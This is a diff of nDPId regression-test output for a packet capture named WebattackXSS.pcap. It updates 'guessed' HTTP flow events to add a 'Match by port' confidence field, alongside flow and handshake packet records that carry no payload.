-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347233219,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347233219,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347233219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Fw9AAD4GrsGsEAABwKgKMtbiAFBsKfwzAAAAAKACchAy\/gAAAgQFtAQCCAoBOes8AAAAAAEDAwc="}
@@ -814,17 +814,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347240786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LjpAAD4Gl5asEAABwKgKMtc0AFB5mNylAAAAAKACchA9aAAAAgQFtAQCCAoBOfKfAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347240786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1zRt9KwCeZjcpqAScSBcVgAAAgQFtAQCCAoD48QWATnynwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1499347240787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347240787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LjtAAD4Gl52sEAABwKgKMtc0AFB5mNymbfSsA4AQAOX7XAAAAQEICgE58qAD48QW"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243071,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347243333,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347243333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347243333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87MZAAD4G2QmsEAABwKgKMtdOAFA1pxnaAAAAAKACchBBjgAAAgQFtAQCCAoBOfUcAAAAAAEDAwc="}
@@ -850,15 +850,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347252179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86Q5AAD4G3MGsEAABwKgKMtesAFDOJxTOAAAAAKACchClFwAAAgQFtAQCCAoBOf3AAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347252179,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ16ypaMjNzicUz6AScSBgpgAAAgQFtAQCCAoD4882ATn9wAEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1499347252180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347252180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06Q9AAD4G3MisEAABwKgKMtesAFDOJxTPqWjIzoAQAOX\/rQAAAQEICgE5\/cAD4882"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347253190,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
